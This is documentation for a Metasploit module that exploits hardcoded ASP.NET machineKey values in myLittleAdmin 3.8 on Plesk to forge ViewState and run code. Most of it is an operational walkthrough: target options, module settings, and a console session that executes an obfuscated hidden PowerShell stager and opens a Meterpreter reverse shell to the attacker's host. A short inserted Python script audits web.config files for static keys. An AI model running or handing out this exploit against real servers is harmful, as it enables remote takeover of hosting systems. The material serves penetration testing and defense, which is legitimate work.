Vulnerable Application
Description
This module exploits a ViewState .NET deserialization vulnerability in the web-based MS SQL Server management tool myLittleAdmin, for version 3.8 and likely older versions, due to hardcoded <machineKey> parameters in the ASP.NET web.config file.
Popular web hosting control panel Plesk offers myLittleAdmin as an optional component that is selected automatically during "full" installation. This exploit caters to the Plesk target, though it should work fine against a standalone myLittleAdmin setup.
Successful exploitation results in code execution as the user running myLittleAdmin, which is IUSRPLESK_sqladmin for Plesk and described as the "SQL Admin MSSQL anonymous account."
Tested on the latest Plesk Obsidian with optional myLittleAdmin 3.8.
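As an added defender-side example (not part of the module or its documentation), the following Python audits a web.config for the root cause described above: a static <machineKey> that lets anyone holding the same file sign their own ViewState, shown beside an auto-generated configuration. The sample configs and key values are constructed placeholders, not myLittleAdmin's actual keys.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample web.config with static, shared machineKey values, the
# weakness this module abuses. The key material is a made-up placeholder,
# not the keys shipped by myLittleAdmin or any other real product.
WEAK_WEB_CONFIG = """<configuration>
  <system.web>
    <machineKey validationKey="{0}" decryptionKey="{1}"
                validation="SHA1" decryption="AES" />
    <pages enableViewStateMac="true" />
  </system.web>
</configuration>""".format("AB" * 64, "CD" * 32)

# Hardened counterpart: ASP.NET generates per-application keys at runtime,
# so nothing in the shipped config lets a third party sign ViewState.
HARDENED_WEB_CONFIG = """<configuration>
  <system.web>
    <machineKey validationKey="AutoGenerate,IsolateApps"
                decryptionKey="AutoGenerate,IsolateApps"
                validation="HMACSHA256" decryption="AES" />
    <pages enableViewStateMac="true" />
  </system.web>
</configuration>"""

HEX_KEY = re.compile(r"^[0-9A-Fa-f]{32,}$")

def audit_machine_key(web_config_xml):
    """Return findings for ViewState signing settings in a web.config."""
    findings = []
    root = ET.fromstring(web_config_xml)
    mk = root.find("./system.web/machineKey")
    if mk is not None:
        for attr in ("validationKey", "decryptionKey"):
            # A literal hex key is static: anyone holding the same file (e.g.
            # every install of the same product) can forge a valid ViewState MAC.
            if HEX_KEY.match(mk.get(attr, "AutoGenerate")):
                findings.append("static %s in web.config" % attr)
        algo = mk.get("validation", "HMACSHA256")
        if algo.upper() in ("MD5", "SHA1"):
            findings.append("legacy ViewState MAC algorithm: " + algo)
    pages = root.find("./system.web/pages")
    if pages is not None and pages.get("enableViewStateMac", "true").lower() == "false":
        findings.append("enableViewStateMac is disabled")
    return findings

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_WEB_CONFIG), ("hardened", HARDENED_WEB_CONFIG)):
        print(name, audit_machine_key(cfg) or ["no findings"])
```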
Setup
Follow Plesk's official instructions, making sure to select the "Obsidian" release and the Full installation option. This will get you myLittleAdmin. Alternatively, you may select the myLittleAdmin component manually.
Verification Steps
Targets
0: This executes a Windows command.
1: This uses a Windows dropper to execute code.
2: This uses a PowerShell stager to execute code.
Options
RPORT: You may need to change RPORT to where myLittleAdmin is running. It is set to port 8401 by default for Plesk installations.
Scenarios
myLittleAdmin 3.8 on Plesk Obsidian on Windows Server 2016
msf5 > use exploit/windows/http/plesk_mylittleadmin_viewstate
msf5 exploit(windows/http/plesk_mylittleadmin_viewstate) > options
Module options (exploit/windows/http/plesk_mylittleadmin_viewstate):
   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8401             yes       The myLittleAdmin port (default for Plesk!) (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host
Payload options (windows/x64/meterpreter/reverse_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port
Exploit target:
   Id  Name
   --  ----
   2   PowerShell Stager
msf5 exploit(windows/http/plesk_mylittleadmin_viewstate) > set rhosts 172.16.249.169
rhosts => 172.16.249.169
msf5 exploit(windows/http/plesk_mylittleadmin_viewstate) > set lhost 172.16.249.1
lhost => 172.16.249.1
msf5 exploit(windows/http/plesk_mylittleadmin_viewstate) > run
[*] Started reverse TCP handler on 172.16.249.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] myLittleAdmin is running at https://172.16.249.169:8401/
[+] The target is vulnerable. We can sign our own ViewState.
[*] Executing PowerShell Stager for windows/x64/meterpreter/reverse_tcp
[*] Powershell command length: 2498
[*] Executing command: powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{$b='powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''...''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
[+] Successfully executed command: powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{$b='powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''...''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
[*] Sending stage (201283 bytes) to 172.16.249.169
[*] Meterpreter session 1 opened (172.16.249.1:4444 -> 172.16.249.169:57257) at 2020-05-21 17:27:42 -0500
meterpreter > getuid
Server username: WIN-NANLB47E6I4\IUSRPLESK_sqladmin
meterpreter > sysinfo
Computer : WIN-NANLB47E6I4
OS : Windows 2016+ (10.0 Build 14393).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 4
Meterpreter : x64/windows
meterpreter >